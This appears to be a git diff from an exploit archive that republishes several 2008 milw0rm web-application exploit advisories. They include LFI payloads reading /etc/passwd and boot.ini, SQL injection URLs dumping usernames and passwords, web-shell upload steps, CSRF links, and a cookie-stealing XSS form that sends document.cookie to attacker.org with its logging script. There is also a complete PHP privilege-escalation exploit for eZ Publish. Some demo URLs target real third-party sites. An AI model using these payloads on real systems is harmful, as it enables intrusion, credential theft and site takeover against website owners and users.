- - -############################################################################################ - -# milw0rm.com [2008-12-14] +############################################################################################ +[+] AutositePHP v2.0.3 (LFI/CSRF/Edit File) Multiple Remote Vulnerabilities +[+] Discovered By SirGod +[+] Greetz : All my friends +[+] Download Script : http://sourceforge.net/projects/autositephp/ +############################################################################################ + +[+] Local File Inclusion + + PoC 1 : + + http://[target]/[path]/index.php?page=users/[Local File] + + Example 1 : + + http://127.0.0.1/path/index.php?page=users/../../../../boot.ini + + + PoC 2 : + + http://[target]/[path]/index.php?page=users/login.php&update=update/[Local +File] + + Example 1 : + + http://127.0.0.1/path/index.php?page=users/login.php&update=update/../../../../boot.ini + + +[+] Edit File + + - Need administrative permissions.You can edit files from the webserver. + + PoC : + + http://[target]/[path]/pages/Admin/File%20Editor/actions/modify.php?page=pages/[Local +File] + + Example : + + http://127.0.0.1/path/pages/Admin/File%20Editor/actions/modify.php?page=pages/../../../../boot.ini + + +[+] Cross Site Request Forgery + + + If a logged in user with administrator privileges clicks on the +following url : + + http://127.0.0.1/path/index.php?page=pages/Admin/Users/viewusers/delete.php&username=SirGod&submit=submit + + The username SirGod will be deleted.You can change the username to another. + + http://127.0.0.1/path/index.php?page=pages/Admin/Users/viewusers/delete.php&username=[USERNAME]&submit=submit + +[USERNAME] = name of account that you want to delete. + + +############################################################################################ + +# milw0rm.com [2008-12-14] diff --git a/platforms/php/webapps/7449.txt b/platforms/php/webapps/7449.txt index 5c9122337..237f32bc4 100755 --- a/platforms/php/webapps/7449.txt 
+++ b/platforms/php/webapps/7449.txt 
@@ -1,21 +1,21 @@ -#################################################################################################### -# iyzi Forum (db/iyziforum.mdb) Database Disclosure Vulnerability # -# © Ghost Hacker - REAL-H.COM # -#################################################################################################### -#[~] Author : Ghost Hacker # -#[~] Homepage : http://Real-h.com # -#[~] Contact Me : Ghost-r00t[at]Hotmail[dot]com # -#[~] Name Script : iyzi Forum # -#[~] Download : http://www.iyziforum.com/ # -#################################################################################################### -#[~]Exploit # -# http://xxxx.com/[path]/db/iyziforum.mdb # -#[~]Live Demo &nb sp; # -# http://www.iyziforum.com/demos/kJd32D33J11lOk6f7n2/db/iyziforum.mdb # -#################################################################################################### -#[~]Greets : # -# Mr.SaFa7 [v4-team.com] , AlpHaNiX , Qabandi # -# All Members Real-h.com and v4-team.net , All My Friends # -#################################################################################################### - -# milw0rm.com [2008-12-14] +#################################################################################################### +# iyzi Forum (db/iyziforum.mdb) Database Disclosure Vulnerability # +# © Ghost Hacker - REAL-H.COM # +#################################################################################################### +#[~] Author : Ghost Hacker # +#[~] Homepage : http://Real-h.com # +#[~] Contact Me : Ghost-r00t[at]Hotmail[dot]com # +#[~] Name Script : iyzi Forum # +#[~] Download : http://www.iyziforum.com/ # +#################################################################################################### +#[~]Exploit # +# http://xxxx.com/[path]/db/iyziforum.mdb # +#[~]Live Demo &nb sp; # +# http://www.iyziforum.com/demos/kJd32D33J11lOk6f7n2/db/iyziforum.mdb # 
+#################################################################################################### +#[~]Greets : # +# Mr.SaFa7 [v4-team.com] , AlpHaNiX , Qabandi # +# All Members Real-h.com and v4-team.net , All My Friends # +#################################################################################################### + +# milw0rm.com [2008-12-14] diff --git a/platforms/php/webapps/7451.txt b/platforms/php/webapps/7451.txt index 57a7d4bf8..0d5864aa4 100755 --- a/platforms/php/webapps/7451.txt +++ b/platforms/php/webapps/7451.txt 
@@ -1,29 +1,29 @@ -****(Lfi/xss)**** - -script: phpweather-2.2.2 - -*************************************************************************** -download from:http://downloads.sourceforge.net/phpweather/phpweather-2.2.2.zip?modtime=1087430400&big_mirror=0 - -*************************************************************************** -vul: -/test.php - -line 48: - require(PHPWEATHER_BASE_DIR . "/output/pw_text_$language.php"); - -*************************************************** -xpl: -www.site.com/path/test.php?metar=()&language=[Lfi]%00 -..................................................... -www.site.com/path/index.php?cc=[Lfi] -.................................................... -xss: -www.site.com/path/config/make_config.php/>"><ScRiPt>alert(0)</ScRiPt> -.................................................. - -Author: ahmadbady from:iran - -*************************************************** - -# milw0rm.com [2008-12-14] +****(Lfi/xss)**** + +script: phpweather-2.2.2 + +*************************************************************************** +download from:http://downloads.sourceforge.net/phpweather/phpweather-2.2.2.zip?modtime=1087430400&big_mirror=0 + +*************************************************************************** +vul: +/test.php + +line 48: + require(PHPWEATHER_BASE_DIR . "/output/pw_text_$language.php"); + +*************************************************** +xpl: +www.site.com/path/test.php?metar=()&language=[Lfi]%00 +..................................................... +www.site.com/path/index.php?cc=[Lfi] +.................................................... +xss: +www.site.com/path/config/make_config.php/>"><ScRiPt>alert(0)</ScRiPt> +.................................................. + +Author: ahmadbady from:iran + +*************************************************** + +# milw0rm.com [2008-12-14] diff --git a/platforms/php/webapps/7453.txt b/platforms/php/webapps/7453.txt index cd81d4c25..4e6687544 100755 
--- a/platforms/php/webapps/7453.txt +++ b/platforms/php/webapps/7453.txt @@ -1,31 +1,31 @@ -#Free Links Directory Script (id) SQL Injection Vulnerability - - -#Author: nuclear - - -#site: -http://flds-script.com - - -#vuln: -http://localhost/[path]/redir.php?id=-1%20UNION%20SELECT%201,2,@@version,4,5,6,7,8,9,10,11/* - - -#vulnerable code: -$ida = $_GET['id']; -$link = mysql_fetch_array(mysql_query("select * from links where id=$ida")); -$idcheck = mysql_numrows(mysql_query("select * from links where id=$ida")); - - -#demo: -http://flds-script.com/demo/redir.php?id=-1 UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11 - -#notes: -the injection does not work if trying to comment out the rest of the query.The result page will be a 404 but -you can get the data of the injection in the url - - -#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar - -# milw0rm.com [2008-12-14] +#Free Links Directory Script (id) SQL Injection Vulnerability + + +#Author: nuclear + + +#site: +http://flds-script.com + + +#vuln: +http://localhost/[path]/redir.php?id=-1%20UNION%20SELECT%201,2,@@version,4,5,6,7,8,9,10,11/* + + +#vulnerable code: +$ida = $_GET['id']; +$link = mysql_fetch_array(mysql_query("select * from links where id=$ida")); +$idcheck = mysql_numrows(mysql_query("select * from links where id=$ida")); + + +#demo: +http://flds-script.com/demo/redir.php?id=-1 UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11 + +#notes: +the injection does not work if trying to comment out the rest of the query.The result page will be a 404 but +you can get the data of the injection in the url + + +#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar + +# milw0rm.com [2008-12-14] diff --git a/platforms/php/webapps/7455.txt b/platforms/php/webapps/7455.txt index 4fadbe2c6..3925edb48 100755 --- a/platforms/php/webapps/7455.txt +++ b/platforms/php/webapps/7455.txt 
@@ -1,17 +1,17 @@ ----------------------------- -The Rat Cms Alpha 2 > Priviledge Escalation ----------------------------- -Autore: x0r -Email: andry2000@hotmail.it -Download: -http://downloads.sourceforge.net/the-rat-cms/trcms_pre_alpha_2.zip?modtime=1174590953&big_mirror=0 ----------------------------- -Bug In: /admin/*.php - -So Funny ^^ - -Exploit: - -http://[victim]/admin/download.php [ just a example ^^ ] - -# milw0rm.com [2008-12-14] +---------------------------- +The Rat Cms Alpha 2 > Priviledge Escalation +---------------------------- +Autore: x0r +Email: andry2000@hotmail.it +Download: +http://downloads.sourceforge.net/the-rat-cms/trcms_pre_alpha_2.zip?modtime=1174590953&big_mirror=0 +---------------------------- +Bug In: /admin/*.php + +So Funny ^^ + +Exploit: + +http://[victim]/admin/download.php [ just a example ^^ ] + +# milw0rm.com [2008-12-14] diff --git a/platforms/php/webapps/7456.txt b/platforms/php/webapps/7456.txt index 9fa365b6f..c7eefb97e 100755 --- a/platforms/php/webapps/7456.txt +++ b/platforms/php/webapps/7456.txt 
@@ -1,37 +1,37 @@ -[~] Availscript Article Script Remote File Upload Vulnerability -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: S.W.A.T. svvateam@yahoo.com -[~] -[~] Home: www.batlagh.com -[~] -[~] Script Page: http://www.availscript.com/article_script.php -[~] ----------------------------------------------------------- - -Xpl: - -1.First Register Into The Site ( link: www.site.com/[path]/signup.php ) - -2.Login With Your Email & Password - -3.After That Go To "Add Pen/Author Name" ( link: www.site.com/[path]/memberarea/addpen.php ) -& Write Your Author & Select Your Shell.php like: c99.php - -4.Your Shell Will Be Appear In This Folder ( link: www.site.com/[path]/photos/ ) - -5.Your Shell Will Be Renamed With Random Text like: cc1bd-c99.php - -6.Hack The Site ;) - - -Demo: - -http://www.availscript.com/article_script/ - - - -[~] Special Thanks To: - -Str0ke, All My Friends, Iranian Hackers & All Muslim - -# milw0rm.com [2008-12-14] +[~] Availscript Article Script Remote File Upload Vulnerability +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: S.W.A.T. svvateam@yahoo.com +[~] +[~] Home: www.batlagh.com +[~] +[~] Script Page: http://www.availscript.com/article_script.php +[~] ----------------------------------------------------------- + +Xpl: + +1.First Register Into The Site ( link: www.site.com/[path]/signup.php ) + +2.Login With Your Email & Password + +3.After That Go To "Add Pen/Author Name" ( link: www.site.com/[path]/memberarea/addpen.php ) +& Write Your Author & Select Your Shell.php like: c99.php + +4.Your Shell Will Be Appear In This Folder ( link: www.site.com/[path]/photos/ ) + +5.Your Shell Will Be Renamed With Random Text like: cc1bd-c99.php + +6.Hack The Site ;) + + +Demo: + +http://www.availscript.com/article_script/ + + + +[~] Special Thanks To: + +Str0ke, All My Friends, Iranian Hackers & All Muslim + +# milw0rm.com [2008-12-14] 
diff --git a/platforms/php/webapps/7457.txt b/platforms/php/webapps/7457.txt index 369139600..d5acd4f8d 100755 --- a/platforms/php/webapps/7457.txt +++ b/platforms/php/webapps/7457.txt 
@@ -1,36 +1,36 @@
-[~] Availscript Classmate Script Remote File Upload Vulnerability
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: S.W.A.T. svvateam@yahoo.com
-[~]
-[~] Home: www.batlagh.com
-[~]
-[~] Script Page: http://www.availscript.com/classmate_script.php
-[~] -----------------------------------------------------------
-
-Xpl:
-
-1.First Register Into The Site ( link: www.site.com/[path]/register.php )
-
-2.In Register Section Select Your phpshell like: c99.php
-
-3.In "Latest Members" Section Right Click On Blank Line & Then Choose Properties
-
-4.Copy The Link Of Your Shell Like: http://www.availscript.com/classmate/memberspics/saeid-61609-c99.php
-
-5.Your Shell Will Be Renamed With Your Name & Random ID like: saeid-61609-c99.php
-
-6.Hack The Site ;)
-
-
-Demo:
-
-http://www.availscript.com/classmate/
-
-
-
-[~] Special Thanks To:
-
-Str0ke, All My Friends, Iranian Hackers & All Muslim
-
-# milw0rm.com [2008-12-14]
+[~] Availscript Classmate Script Remote File Upload Vulnerability
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: S.W.A.T. svvateam@yahoo.com
+[~]
+[~] Home: www.batlagh.com
+[~]
+[~] Script Page: http://www.availscript.com/classmate_script.php
+[~] -----------------------------------------------------------
+
+Xpl:
+
+1.First Register Into The Site ( link: www.site.com/[path]/register.php )
+
+2.In Register Section Select Your phpshell like: c99.php
+
+3.In "Latest Members" Section Right Click On Blank Line & Then Choose Properties
+
+4.Copy The Link Of Your Shell Like: http://www.availscript.com/classmate/memberspics/saeid-61609-c99.php
+
+5.Your Shell Will Be Renamed With Your Name & Random ID like: saeid-61609-c99.php
+
+6.Hack The Site ;)
+
+
+Demo:
+
+http://www.availscript.com/classmate/
+
+
+
+[~] Special Thanks To:
+
+Str0ke, All My Friends, Iranian Hackers & All Muslim
+
+# milw0rm.com [2008-12-14]
diff --git a/platforms/php/webapps/7458.txt b/platforms/php/webapps/7458.txt
index 12fcaba9d..2a393e752 100755
--- a/platforms/php/webapps/7458.txt
+++ b/platforms/php/webapps/7458.txt
@@ -1,37 +1,37 @@
-[START]
-
-#########################################################################################
-[0x01] Informations:
-
-Script : Mediatheka 4.2
-Download : http://www.hotscripts.com/jump.php?listing_id=79106&jump_type=1
-Vulnerability : Local File Inclusion
-Author : Osirys
-Contact : osirys[at]live[dot]it
-Notes : Proud to be Italian
-Greets: : XaDoS, x0r, emgent, Jay, str0ke
-
-#########################################################################################
-[0x02] Bug:[Local File Inclusion]
-######
-
-Bugged file is: /[path]/index.php
-
-[CODE]
-
- if(isset($_GET['lang']))
- $lang = $_GET['lang'];
- else
- $lang = 'en';
- include("langs/$lang.php");
-
-[/CODE]
-
-
-[!] EXPLOIT: /[path]/index.php?lang=[local_file_to_include]
- ../../../../../../../../../../../etc/passwd%00
-#########################################################################################
-
-[/END]
-
-# milw0rm.com [2008-12-14]
+[START]
+
+#########################################################################################
+[0x01] Informations:
+
+Script : Mediatheka 4.2
+Download : http://www.hotscripts.com/jump.php?listing_id=79106&jump_type=1
+Vulnerability : Local File Inclusion
+Author : Osirys
+Contact : osirys[at]live[dot]it
+Notes : Proud to be Italian
+Greets: : XaDoS, x0r, emgent, Jay, str0ke
+
+#########################################################################################
+[0x02] Bug:[Local File Inclusion]
+######
+
+Bugged file is: /[path]/index.php
+
+[CODE]
+
+ if(isset($_GET['lang']))
+ $lang = $_GET['lang'];
+ else
+ $lang = 'en';
+ include("langs/$lang.php");
+
+[/CODE]
+
+
+[!] EXPLOIT: /[path]/index.php?lang=[local_file_to_include]
+ ../../../../../../../../../../../etc/passwd%00
+#########################################################################################
+
+[/END]
+
+# milw0rm.com [2008-12-14]
diff --git a/platforms/php/webapps/7461.txt b/platforms/php/webapps/7461.txt
index 918d5a6e1..93cb6ead3 100755
--- a/platforms/php/webapps/7461.txt
+++ b/platforms/php/webapps/7461.txt
@@ -1,42 +1,42 @@
-<!--
-exploit flatnux grabber cookies visitor
-site :http://www.speleoalex.altervista.org/flatnuke3/index.php
-download:http://www.speleoalex.altervista.org/flatnuke3/index.php?mod=06_Download
-author:gmda
-
-Flatnux does not filter code html/javascript then you can injector in this way:
-
-operation
-1] register
-2] make longin
-3] use the HTML code below
--->
-<html><head>
-</head>
-<body>
-<form enctype="multipart/form-data" action="http://victim.org/flatnux/index.php?mod=08_Files&opmod=insertrecord" method="POST">
-titolo*<input size ="20" style="visibility:hidden;" value="filex <iframe width="0" height="0" style="visibility:hidden;" src="javascript:window.location='http://attacker.org/grab.php?cmd='+document.cookie;"></iframe>" name="name" type="text" /><br />
-<textarea title="Inserisci qui la descrizione" cols="80" rows="10" name="description" style="visibility:hidden;" ></textarea><br />
-Immagine<input size="20" name="foto1" type="file" style="visibility:hidden;" /><br />
-File<input size="20" name="file" type="file" style="visibility:hidden;" /><br />
-<input type="submit" value="Zic">
-</form>
-</body></html>
-<!-- grab.php
-<?php $data = $_GET['cmd'];
-$date=date("j F, Y, g:i a");
-$referer=$_SERVER['HTTP_REFERER'];
-$fh = fopen("cookie.txt",'a+');
-fwrite($fh, $referer . " / " . $data."\n".$date."\n");
-fclose($fh);
-?>
--->
-
-<!-- xss variables mod foto
-
-/sections/05_Foto/photo.php?mod=05_Foto&foto=>"><script>alert(69)%3B</script>&lang=it
-/?mod=%3E%22%3E%3Cscript%3Ealert(69)%3B%3C/script%3E
-
--->
-
-# milw0rm.com [2008-12-14]
+<!--
+exploit flatnux grabber cookies visitor
+site :http://www.speleoalex.altervista.org/flatnuke3/index.php
+download:http://www.speleoalex.altervista.org/flatnuke3/index.php?mod=06_Download
+author:gmda
+
+Flatnux does not filter code html/javascript then you can injector in this way:
+
+operation
+1] register
+2] make longin
+3] use the HTML code below
+-->
+<html><head>
+</head>
+<body>
+<form enctype="multipart/form-data" action="http://victim.org/flatnux/index.php?mod=08_Files&opmod=insertrecord" method="POST">
+titolo*<input size ="20" style="visibility:hidden;" value="filex <iframe width="0" height="0" style="visibility:hidden;" src="javascript:window.location='http://attacker.org/grab.php?cmd='+document.cookie;"></iframe>" name="name" type="text" /><br />
+<textarea title="Inserisci qui la descrizione" cols="80" rows="10" name="description" style="visibility:hidden;" ></textarea><br />
+Immagine<input size="20" name="foto1" type="file" style="visibility:hidden;" /><br />
+File<input size="20" name="file" type="file" style="visibility:hidden;" /><br />
+<input type="submit" value="Zic">
+</form>
+</body></html>
+<!-- grab.php
+<?php $data = $_GET['cmd'];
+$date=date("j F, Y, g:i a");
+$referer=$_SERVER['HTTP_REFERER'];
+$fh = fopen("cookie.txt",'a+');
+fwrite($fh, $referer . " / " . $data."\n".$date."\n");
+fclose($fh);
+?>
+-->
+
+<!-- xss variables mod foto
+
+/sections/05_Foto/photo.php?mod=05_Foto&foto=>"><script>alert(69)%3B</script>&lang=it
+/?mod=%3E%22%3E%3Cscript%3Ealert(69)%3B%3C/script%3E
+
+-->
+
+# milw0rm.com [2008-12-14]
diff --git a/platforms/php/webapps/7465.txt b/platforms/php/webapps/7465.txt
index c645112cc..55f4d33ec 100755
--- a/platforms/php/webapps/7465.txt
+++ b/platforms/php/webapps/7465.txt
@@ -1,39 +1,39 @@
-[â– ] IsWeb CMS v 3.0 ($qL/XsS) Multiple vulnerabilities
-
->---------------------------------------<
-
-> AuToR: XaDoS (SecurityCode Team)
-> Contact M&: xados [at] hotmail [dot] it
-> B§g: Blind $ql inJection
-> SIte vuln: http://www.cmsisweb.it
-
->---------------------------------------<
-
-
-[â– ] BlinD $qL:
-
-|: http://www.example.com/index.php?id_sezione=[$qL]
-
-> DeM0:
-
-|: http://www.comune.avezzano.aq.it/index.php?id_sezione=297%20and%20substring(@@version,1,1)=4 [No]
-
-|: http://www.comune.avezzano.aq.it/index.php?id_sezione=297%20and%20substring(@@version,1,1)=5 [Ye$]
-
-
-[â– ] XSS:
-
-|: http://www.comune.avezzano.aq.it/index.php?azione=cerca
- In this modul (search) write:
-
- "><script>alert(document.cookie)</script>
-
-or another vuln Page:
-
-|: http://www.comune.avezzano.aq.it/index.php?id_doc=19&id_oggetto=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20XaDoS%3Ch1%3E%3C/marquee%3E
-
-[â– ] Th4nKs::
-
-\>Str0ke</ - \>Fuck you 007 hacker</ - \>Securitycode team</ - \>All italian hackers</
-
-# milw0rm.com [2008-12-14]
+[â– ] IsWeb CMS v 3.0 ($qL/XsS) Multiple vulnerabilities
+
+>---------------------------------------<
+
+> AuToR: XaDoS (SecurityCode Team)
+> Contact M&: xados [at] hotmail [dot] it
+> B§g: Blind $ql inJection
+> SIte vuln: http://www.cmsisweb.it
+
+>---------------------------------------<
+
+
+[â– ] BlinD $qL:
+
+|: http://www.example.com/index.php?id_sezione=[$qL]
+
+> DeM0:
+
+|: http://www.comune.avezzano.aq.it/index.php?id_sezione=297%20and%20substring(@@version,1,1)=4 [No]
+
+|: http://www.comune.avezzano.aq.it/index.php?id_sezione=297%20and%20substring(@@version,1,1)=5 [Ye$]
+
+
+[â– ] XSS:
+
+|: http://www.comune.avezzano.aq.it/index.php?azione=cerca
+ In this modul (search) write:
+
+ "><script>alert(document.cookie)</script>
+
+or another vuln Page:
+
+|: http://www.comune.avezzano.aq.it/index.php?id_doc=19&id_oggetto=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20XaDoS%3Ch1%3E%3C/marquee%3E
+
+[â– ] Th4nKs::
+
+\>Str0ke</ - \>Fuck you 007 hacker</ - \>Securitycode team</ - \>All italian hackers</
+
+# milw0rm.com [2008-12-14]
diff --git a/platforms/php/webapps/7473.php b/platforms/php/webapps/7473.php
index d7250141e..ac14113bb 100755
--- a/platforms/php/webapps/7473.php
+++ b/platforms/php/webapps/7473.php
@@ -1,181 +1,181 @@ -<?php - -/* - eZ Publish privilege escalation and weak activation token for new user exploit by s4avrd0w [s4avrd0w@p0c.ru] - Versions affected >= 3.5.6 - eZ Publish privilege escalation resolved in 3.9.5, 3.10.1, 4.0.1 - More info: http://ez.no/developer/security/security_advisories/ez_publish_3_9/ezsa_2008_003_insufficient_form_handling_made_privilege_escalation_possible - - eZ Publish weak activation token for new user not resolved now (zero-day). - Vulnerable code in the version 3.9.2: - $hash = md5( mktime( ) . $user->attribute( 'contentobject_id' ) ); - Vulnerable code in the version 4.0.1: - $hash = md5( time() . $user->attribute( 'contentobject_id' ) ); - - * tested on version 3.9.2 - - usage: - - # ./eZPublish_create_admin_exploit.php -u=username -p=password -s=EZPublish_server [ -e=email -t=timestamp ] - - The options are required: - -u Login of the new admin on eZ Publish - -p Password of the new admin on eZ Publish - -s Target for privilege escalation - - The options are optional: - -t Unix timestamp for a date on target eZ Publish server - This option is required in a case when on a target server incorrect time is established. - Default is unix timestamp for a date on local computer. - -e Email of the new admin on eZ Publish - Default is anybody@localhost.localhost. - - example: - - # ./eZPublish_create_admin_exploit.php -u=admin -p=P@ssw0rd -s=http://127.0.0.1/ -e=my_mail@google.com -t=1229194235 - [+] Phase 1 successfully finished - [+] Use timestamp: 1229194235 - [+] Begin bruteforce... - .................... - [+] Phase 2 successfully finished - - [+] Exploiting is finished successfully - [+] Login in system using admin/P@ssw0rd - -*/ - -function help_argc($script_name) -{ -print " -usage: - -# ./".$script_name." 
-u=username -p=password -s=EZPublish_server [ -e=email -t=timestamp ] - -The options are required: - -u Login of the new admin on eZ Publish - -p Password of the new admin on eZ Publish - -s Target for privilege escalation - -The options are optional: - -t Unix timestamp for a date on target eZ Publish server - (default is unix timestamp for a date on local computer) - -e Email of the new admin on eZ Publish - (default is anybody@localhost.localhost) - -example: - -# ./".$script_name." -u=admin -p=P@ssw0rd -s=http://127.0.0.1/ -[+] Phase 1 successfully finished -[+] Use timestamp: 1229194235 -[+] Begin bruteforce... -.................... -[+] Phase 2 successfully finished - -[+] Exploiting is finished successfully -[+] Login in system using admin/P@ssw0rd -"; -} - -function successfully($login,$password) -{ -print " -[+] Phase 2 successfully finished - -[+] Exploiting is finished successfully -[+] Login in system using $login/$password -"; -} - -if (($argc != 4 && $argc != 5 && $argc != 6) || in_array($argv[1], array('--help', '-help', '-h', '-?'))) -{ - help_argc($argv[0]); - exit(0); -} -else -{ - $ARG = array(); - foreach ($argv as $arg) { - if (strpos($arg, '-') === 0) { - $key = substr($arg,1,1); - if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg)); - } - } - - if ($ARG[u] && $ARG[p] && $ARG[s]) - { - - if (!$ARG[e]) $ARG[e] = "anybody@localhost.localhost"; - - $post_fields = array( - 'ContentObjectAttribute_data_user_login_30' => $ARG[u], - 'ContentObjectAttribute_data_user_password_30' => $ARG[p], - 'ContentObjectAttribute_data_user_password_confirm_30' => $ARG[p], - 'ContentObjectAttribute_data_user_email_30' => $ARG[e], - 'UserID' => '14', - 'PublishButton' => '1' - ); - - $headers = array( - 'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14', - 'Referer' => $ARG[s] - ); - - $res_http = new HttpRequest($ARG[s]."/user/register", HttpRequest::METH_POST); - 
$res_http->addPostFields($post_fields); - $res_http->addHeaders($headers); - try { - if ($ARG[t]) { $time = $ARG[t]; } else { $time = mktime( ); } - $response = $res_http->send()->getBody(); - - if (eregi("success", $response) || eregi("Fatal error", $response)) - { - print "[+] Phase 1 successfully finished\n"; - print "[+] Use timestamp: $time\n"; - print "[+] Begin bruteforce...\n"; - - for ($i = $time; $i<$time+100; $i++) - { - print "."; - $hash = md5( $i . "14" ); - $res_http = new HttpRequest($ARG[s]."/user/activate/".$hash, HttpRequest::METH_GET); - $res_http->addHeaders($headers); - try { - $response = $res_http->send()->getBody(); - - if (eregi("Your account is now activated", $response)) - { - successfully($ARG[u],$ARG[p]); - exit(1); - } - - - } catch (HttpException $exception) { - print "\n[-] Not connected"; - exit(0); - } - } - print "\n[-] Exploit failed"; - } - else - { - print "[-] Exploit failed"; - } - - } catch (HttpException $exception) { - - print "[-] Not connected"; - exit(0); - - } - - } - else - { - help_argc($argv[0]); - exit(0); - } -} - -?> - -# milw0rm.com [2008-12-15] +<?php + +/* + eZ Publish privilege escalation and weak activation token for new user exploit by s4avrd0w [s4avrd0w@p0c.ru] + Versions affected >= 3.5.6 + eZ Publish privilege escalation resolved in 3.9.5, 3.10.1, 4.0.1 + More info: http://ez.no/developer/security/security_advisories/ez_publish_3_9/ezsa_2008_003_insufficient_form_handling_made_privilege_escalation_possible + + eZ Publish weak activation token for new user not resolved now (zero-day). + Vulnerable code in the version 3.9.2: + $hash = md5( mktime( ) . $user->attribute( 'contentobject_id' ) ); + Vulnerable code in the version 4.0.1: + $hash = md5( time() . 
$user->attribute( 'contentobject_id' ) ); + + * tested on version 3.9.2 + + usage: + + # ./eZPublish_create_admin_exploit.php -u=username -p=password -s=EZPublish_server [ -e=email -t=timestamp ] + + The options are required: + -u Login of the new admin on eZ Publish + -p Password of the new admin on eZ Publish + -s Target for privilege escalation + + The options are optional: + -t Unix timestamp for a date on target eZ Publish server + This option is required in a case when on a target server incorrect time is established. + Default is unix timestamp for a date on local computer. + -e Email of the new admin on eZ Publish + Default is anybody@localhost.localhost. + + example: + + # ./eZPublish_create_admin_exploit.php -u=admin -p=P@ssw0rd -s=http://127.0.0.1/ -e=my_mail@google.com -t=1229194235 + [+] Phase 1 successfully finished + [+] Use timestamp: 1229194235 + [+] Begin bruteforce... + .................... + [+] Phase 2 successfully finished + + [+] Exploiting is finished successfully + [+] Login in system using admin/P@ssw0rd + +*/ + +function help_argc($script_name) +{ +print " +usage: + +# ./".$script_name." -u=username -p=password -s=EZPublish_server [ -e=email -t=timestamp ] + +The options are required: + -u Login of the new admin on eZ Publish + -p Password of the new admin on eZ Publish + -s Target for privilege escalation + +The options are optional: + -t Unix timestamp for a date on target eZ Publish server + (default is unix timestamp for a date on local computer) + -e Email of the new admin on eZ Publish + (default is anybody@localhost.localhost) + +example: + +# ./".$script_name." -u=admin -p=P@ssw0rd -s=http://127.0.0.1/ +[+] Phase 1 successfully finished +[+] Use timestamp: 1229194235 +[+] Begin bruteforce... +.................... 
+[+] Phase 2 successfully finished + +[+] Exploiting is finished successfully +[+] Login in system using admin/P@ssw0rd +"; +} + +function successfully($login,$password) +{ +print " +[+] Phase 2 successfully finished + +[+] Exploiting is finished successfully +[+] Login in system using $login/$password +"; +} + +if (($argc != 4 && $argc != 5 && $argc != 6) || in_array($argv[1], array('--help', '-help', '-h', '-?'))) +{ + help_argc($argv[0]); + exit(0); +} +else +{ + $ARG = array(); + foreach ($argv as $arg) { + if (strpos($arg, '-') === 0) { + $key = substr($arg,1,1); + if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg)); + } + } + + if ($ARG[u] && $ARG[p] && $ARG[s]) + { + + if (!$ARG[e]) $ARG[e] = "anybody@localhost.localhost"; + + $post_fields = array( + 'ContentObjectAttribute_data_user_login_30' => $ARG[u], + 'ContentObjectAttribute_data_user_password_30' => $ARG[p], + 'ContentObjectAttribute_data_user_password_confirm_30' => $ARG[p], + 'ContentObjectAttribute_data_user_email_30' => $ARG[e], + 'UserID' => '14', + 'PublishButton' => '1' + ); + + $headers = array( + 'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14', + 'Referer' => $ARG[s] + ); + + $res_http = new HttpRequest($ARG[s]."/user/register", HttpRequest::METH_POST); + $res_http->addPostFields($post_fields); + $res_http->addHeaders($headers); + try { + if ($ARG[t]) { $time = $ARG[t]; } else { $time = mktime( ); } + $response = $res_http->send()->getBody(); + + if (eregi("success", $response) || eregi("Fatal error", $response)) + { + print "[+] Phase 1 successfully finished\n"; + print "[+] Use timestamp: $time\n"; + print "[+] Begin bruteforce...\n"; + + for ($i = $time; $i<$time+100; $i++) + { + print "."; + $hash = md5( $i . 
"14" ); + $res_http = new HttpRequest($ARG[s]."/user/activate/".$hash, HttpRequest::METH_GET); + $res_http->addHeaders($headers); + try { + $response = $res_http->send()->getBody(); + + if (eregi("Your account is now activated", $response)) + { + successfully($ARG[u],$ARG[p]); + exit(1); + } + + + } catch (HttpException $exception) { + print "\n[-] Not connected"; + exit(0); + } + } + print "\n[-] Exploit failed"; + } + else + { + print "[-] Exploit failed"; + } + + } catch (HttpException $exception) { + + print "[-] Not connected"; + exit(0); + + } + + } + else + { + help_argc($argv[0]); + exit(0); + } +} + +?> + +# milw0rm.com [2008-12-15] diff --git a/platforms/php/webapps/7474.txt b/platforms/php/webapps/7474.txt index fe72a7abe..192fd3581 100755 --- a/platforms/php/webapps/7474.txt +++ b/platforms/php/webapps/7474.txt 
@@ -1,24 +1,24 @@
-#Free Links Directory Script (id) SQL Injection Vulnerability
-
-
-#Author: nuclear
-
-
-#site:
-http://flds-script.com
-
-
-#vuln:
-http://localhost/[path]/lpro.php?id=-1 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11 from users
-
-
-#demo:
-http://flds-script.com/demo/lpro.php?id=-1%20UNION%20SELECT%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11%20from%20users
-
-#notes:
-Script is full of bugs like this, too bored to catch em all !
-
-
-#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar
-
-# milw0rm.com [2008-12-15]
+#Free Links Directory Script (id) SQL Injection Vulnerability
+
+
+#Author: nuclear
+
+
+#site:
+http://flds-script.com
+
+
+#vuln:
+http://localhost/[path]/lpro.php?id=-1 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11 from users
+
+
+#demo:
+http://flds-script.com/demo/lpro.php?id=-1%20UNION%20SELECT%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11%20from%20users
+
+#notes:
+Script is full of bugs like this, too bored to catch em all !
+
+
